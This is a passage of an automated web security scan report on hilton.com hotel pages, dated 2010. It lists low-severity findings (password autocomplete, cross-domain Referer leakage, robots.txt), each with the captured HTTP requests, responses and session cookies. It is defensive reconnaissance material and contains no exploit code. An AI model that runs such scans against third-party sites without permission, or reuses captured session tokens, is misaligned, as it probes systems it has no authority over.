Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


5.1. http://www1.hilton.com/en_US/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texas/index.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texas/index.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_US/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texas/index.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Wed, 06 Oct 2010 13:48:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=3AC3AB2062A3278A46A8C0D50BAAD192.etc54; Path=/
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Wed, 06-Oct-10 13:59:12 GMT;path=/
Content-Length: 82606


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
   <meta http
...[SNIP]...
</div>
           
           
               <form name="frmSignin" action="/doxch.do;jsessionid=3AC3AB2062A3278A46A8C0D50BAAD192.etc54?dst=https://HI/en/hi/PFSLogin" method="post">
           
<input type="hidden" name="prevPageTitle" value="">
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...

5.2. http://www1.hilton.com/en_US/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texas/index.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texas/index.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_US/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texas/index.do;jsessionid=F57D2DACFFCDA4F0D4D59B9FB2247200.etc81?brand_id=HI&brand_directory=/en/hi/&xch=694469540,N3FDY4YMODSWGCSGBIV222Q HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Wed, 06 Oct 2010 13:48:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=1BCEBF8FCA9CA5E8E75FDA3CC6057730.etc81; Path=/
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Wed, 06-Oct-10 13:59:12 GMT;path=/
Content-Length: 82591


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
   <meta http
...[SNIP]...
</div>
           
           
               <form name="frmSignin" action="/doxch.do;jsessionid=1BCEBF8FCA9CA5E8E75FDA3CC6057730.etc81?dst=https://HI/en/hi/PFSLogin" method="post">
           
<input type="hidden" name="prevPageTitle" value="">
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...

5.3. http://www1.hilton.com/en_US/hi/hotel/LAXBHHH-The-Beverly-Hilton-California/index.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/LAXBHHH-The-Beverly-Hilton-California/index.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_US/hi/hotel/LAXBHHH-The-Beverly-Hilton-California/index.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Wed, 06 Oct 2010 13:47:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=70D3061EF6F7EDC48B7A613930610779.etc24; Path=/
Set-Cookie: NSC_qse-qgt=44153d5e3660;expires=Wed, 06-Oct-10 13:58:44 GMT;path=/
Content-Length: 86860


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
   <meta http
...[SNIP]...
</div>
           
           
               <form name="frmSignin" action="/doxch.do;jsessionid=70D3061EF6F7EDC48B7A613930610779.etc24?dst=https://HI/en/hi/PFSLogin" method="post">
           
<input type="hidden" name="prevPageTitle" value="">
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...

5.4. http://www1.hilton.com/en_US/hi/hotel/LAXBHHH-The-Beverly-Hilton-California/index.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/LAXBHHH-The-Beverly-Hilton-California/index.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_US/hi/hotel/LAXBHHH-The-Beverly-Hilton-California/index.do?ctyhocn=LAXBHHH HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Wed, 06 Oct 2010 13:47:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=716D75C82E96C5C9D72A5B5739480A2E.etc64; Path=/
Set-Cookie: NSC_qse-qgt=44153d5e3660;expires=Wed, 06-Oct-10 13:58:51 GMT;path=/
Content-Length: 87067


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
   <meta http
...[SNIP]...
</div>
           
           
               <form name="frmSignin" action="/doxch.do;jsessionid=716D75C82E96C5C9D72A5B5739480A2E.etc64?dst=https://HI/en/hi/PFSLogin" method="post">
           
<input type="hidden" name="prevPageTitle" value="">
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...

6. Cross-domain Referer leakage  previous  next
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


6.1. http://www1.hilton.com/en_US/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texas/index.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texas/index.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en_US/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texas/index.do;jsessionid=F57D2DACFFCDA4F0D4D59B9FB2247200.etc81?brand_id=HI&brand_directory=/en/hi/&xch=694469540,N3FDY4YMODSWGCSGBIV222Q HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Wed, 06 Oct 2010 13:48:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=1BCEBF8FCA9CA5E8E75FDA3CC6057730.etc81; Path=/
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Wed, 06-Oct-10 13:59:12 GMT;path=/
Content-Length: 82591


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
   <meta http
...[SNIP]...
<li>Horseback riding trail rides at <a href="http://www.austinranch.net" target=new>Austin Ranch</a>
...[SNIP]...
<li><a href="http://www.austinranch.net" target=new>Austin Ranch</a>
...[SNIP]...
<div class="hotelBox">
                   <a href="http://www.emarketing360.com/Hilton/TX/HDFW/" target="factSheet">
                       <img src="/common/media/images/icons/icon_factsheet.gif" alt="" />
...[SNIP]...
<div class="rightNavLink">
                       <a href="http://www.emarketing360.com/Hilton/TX/HDFW/" target="factSheet">
                           eBrochure
                       </a>
...[SNIP]...
<div class="hotelBox">
                   <a href="http://hilton.ebrochures.org/us/hi/factsheets/DFWAH_full.pdf" target="factSheet">
                       <img src="/common/media/images/icons/icon_factsheet.gif" alt="" />
...[SNIP]...
<div class="rightNavLink">
                       <a href="http://hilton.ebrochures.org/us/hi/factsheets/DFWAH_full.pdf" target="factSheet">
                           Hotel Factsheet
                       </a>
...[SNIP]...
<div class="hotelBox">
                   <a href="http://hilton.ebrochures.org/es/hi/factsheets/DFWAH_full.pdf" target="factSheet">
                       <img src="/common/media/images/icons/icon_factsheet.gif" alt="" />
...[SNIP]...
<div class="rightNavLink">
                       <a href="http://hilton.ebrochures.org/es/hi/factsheets/DFWAH_full.pdf" target="factSheet">
                           Folleto del hotel
                       </a>
...[SNIP]...
<div class="hotelBox">
                   <a href="http://hilton.ebrochures.org/fr/hi/factsheets/DFWAH_full.pdf" target="factSheet">
                       <img src="/common/media/images/icons/icon_factsheet.gif" alt="" />
...[SNIP]...
<div class="rightNavLink">
                       <a href="http://hilton.ebrochures.org/fr/hi/factsheets/DFWAH_full.pdf" target="factSheet">
                           Bulletin d'informations
                       </a>
...[SNIP]...
<div id="rightNavMarketing.staticImage" >

        <a href="http://www.HiltonFamily.com/usolympic"><img name="USOC Logo" src="/common/media/images/logos/usoc.gif" alt="USOC Logo" align="center" border="0" width="135" height="80" />
...[SNIP]...
<li class="brandBarLi brandBarLi_WA" id="brandBarLi_WA"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_WA');" onmouseout="turnOffPopup('brandBarLi_WA');" href="http://www.waldorfastoria.com"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HV" id="brandBarLi_HV"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_HV');" onmouseout="turnOffPopup('brandBarLi_HV');" href="http://www.hiltongrandvacations.com/index.php"><span>
...[SNIP]...
<li>
                                                       
                                                       <a href="http://assistive.usablenet.com/tt/referrer">
                                                           View Text Only
                                                       </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonworldwide.com">
                                                       Hilton Worldwide
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonworldwide.com/careers/index.htm">
                                                       Careers
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonworldwide.com/development/index.htm">
                                                       Franchise Development
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonworldwide.com/media/index.htm">
                                                       Press &amp; Media
                                                   </a>
...[SNIP]...
<li><a href="http://www.hilton.de/SiteHomePage">Germany</a>
...[SNIP]...
<NOSCRIPT>
<IMG ALT="" BORDER="0" NAME="DCSIMG" WIDTH="1" HEIGHT="1" SRC="http://statse.webtrendslive.com/dcsserqb8erp17368wkcsn8pc_2z2f/njs.gif?dcsuri=/nojavascript&amp;WT.js=No">
</NOSCRIPT>
...[SNIP]...
<NOSCRIPT>
<IMG ALT="" BORDER="0" NAME="DCSIMG" WIDTH="1" HEIGHT="1" SRC="http://statse.webtrendslive.com/dcsserqb8erp17368wkcsn8pc_2z2f/njs.gif?dcsuri=/nojavascript&amp;WT.js=No">
</NOSCRIPT>
...[SNIP]...

6.2. http://www1.hilton.com/en_US/hi/hotel/LAXBHHH-The-Beverly-Hilton-California/index.do  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/LAXBHHH-The-Beverly-Hilton-California/index.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en_US/hi/hotel/LAXBHHH-The-Beverly-Hilton-California/index.do?ctyhocn=LAXBHHH HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Wed, 06 Oct 2010 13:47:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=716D75C82E96C5C9D72A5B5739480A2E.etc64; Path=/
Set-Cookie: NSC_qse-qgt=44153d5e3660;expires=Wed, 06-Oct-10 13:58:51 GMT;path=/
Content-Length: 87067


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
   <meta http
...[SNIP]...
<div class="hotelBox">
                   <a href="http://hilton.ebrochures.org/us/hi/factsheets/LAXBH_full.pdf" target="factSheet">
                       <img src="/common/media/images/icons/icon_factsheet.gif" alt="" />
...[SNIP]...
<div class="rightNavLink">
                       <a href="http://hilton.ebrochures.org/us/hi/factsheets/LAXBH_full.pdf" target="factSheet">
                           Hotel Factsheet
                       </a>
...[SNIP]...
<div class="hotelBox">
                   <a href="http://hilton.ebrochures.org/es/hi/factsheets/LAXBH_full.pdf" target="factSheet">
                       <img src="/common/media/images/icons/icon_factsheet.gif" alt="" />
...[SNIP]...
<div class="rightNavLink">
                       <a href="http://hilton.ebrochures.org/es/hi/factsheets/LAXBH_full.pdf" target="factSheet">
                           Folleto del hotel
                       </a>
...[SNIP]...
<div class="hotelBox">
                   <a href="http://hilton.ebrochures.org/fr/hi/factsheets/LAXBH_full.pdf" target="factSheet">
                       <img src="/common/media/images/icons/icon_factsheet.gif" alt="" />
...[SNIP]...
<div class="rightNavLink">
                       <a href="http://hilton.ebrochures.org/fr/hi/factsheets/LAXBH_full.pdf" target="factSheet">
                           Bulletin d'informations
                       </a>
...[SNIP]...
<div class="hotelBox">
                   <a href="http://thebeverly.hiltonemenus.com/home.asp" target="factSheet">
                       <img src="/common/media/images/icons/icon_factsheet.gif" alt="" />
...[SNIP]...
<div class="rightNavLink">
                       <a href="http://thebeverly.hiltonemenus.com/home.asp" target="factSheet">
                           Catering eMenu
                       </a>
...[SNIP]...
<li>
       
       
        <a href="http://thebeverly.hiltonemenus.com/home.asp?cid=OH,HH,laxbh,MenuB" title="" target="_blank" class=""><img src="http://www.hilton.com/repositories/marketingmessages/images/HH_MenuBanner_145x145.jpg" alt="" border="0" />
...[SNIP]...
<div id="rightNavMarketing.staticImage" >

        <a href="http://www.HiltonFamily.com/usolympic"><img name="USOC Logo" src="/common/media/images/logos/usoc.gif" alt="USOC Logo" align="center" border="0" width="135" height="80" />
...[SNIP]...
<li class="brandBarLi brandBarLi_WA" id="brandBarLi_WA"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_WA');" onmouseout="turnOffPopup('brandBarLi_WA');" href="http://www.waldorfastoria.com"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HV" id="brandBarLi_HV"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_HV');" onmouseout="turnOffPopup('brandBarLi_HV');" href="http://www.hiltongrandvacations.com/index.php"><span>
...[SNIP]...
<li>
                                                       
                                                       <a href="http://assistive.usablenet.com/tt/referrer">
                                                           View Text Only
                                                       </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonworldwide.com">
                                                       Hilton Worldwide
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonworldwide.com/careers/index.htm">
                                                       Careers
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonworldwide.com/development/index.htm">
                                                       Franchise Development
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonworldwide.com/media/index.htm">
                                                       Press &amp; Media
                                                   </a>
...[SNIP]...
<li><a href="http://www.hilton.de/SiteHomePage">Germany</a>
...[SNIP]...
<NOSCRIPT>
<IMG ALT="" BORDER="0" NAME="DCSIMG" WIDTH="1" HEIGHT="1" SRC="http://statse.webtrendslive.com/dcsserqb8erp17368wkcsn8pc_2z2f/njs.gif?dcsuri=/nojavascript&amp;WT.js=No">
</NOSCRIPT>
...[SNIP]...
<NOSCRIPT>
<IMG ALT="" BORDER="0" NAME="DCSIMG" WIDTH="1" HEIGHT="1" SRC="http://statse.webtrendslive.com/dcsserqb8erp17368wkcsn8pc_2z2f/njs.gif?dcsuri=/nojavascript&amp;WT.js=No">
</NOSCRIPT>
...[SNIP]...

7. Robots.txt file  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/LAXBHHH-The-Beverly-Hilton-California/index.do

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: www1.hilton.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 10 Sep 2010 21:20:37 GMT
ETag: "fc395-120-515ed340"
Content-Type: text/plain; charset=UTF-8
Cache-Control: private
Date: Wed, 06 Oct 2010 13:47:46 GMT
Content-Length: 288
Connection: close
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Wed, 06-Oct-10 13:58:46 GMT;path=/

User-agent: Googlebot
Disallow:/en_US/hs/

User-agent: Yahoo! Slurp
Disallow:/en_US/hs/

User-agent: MSNbot
Disallow:/en_US/hs/

User-agent: Scooter
Disallow:/en_US/hs/

User-agent: Ask.com/Teoma
Disa
...[SNIP]...

Report generated by Hoyt LLC Research at Wed Oct 06 09:51:00 EDT 2010.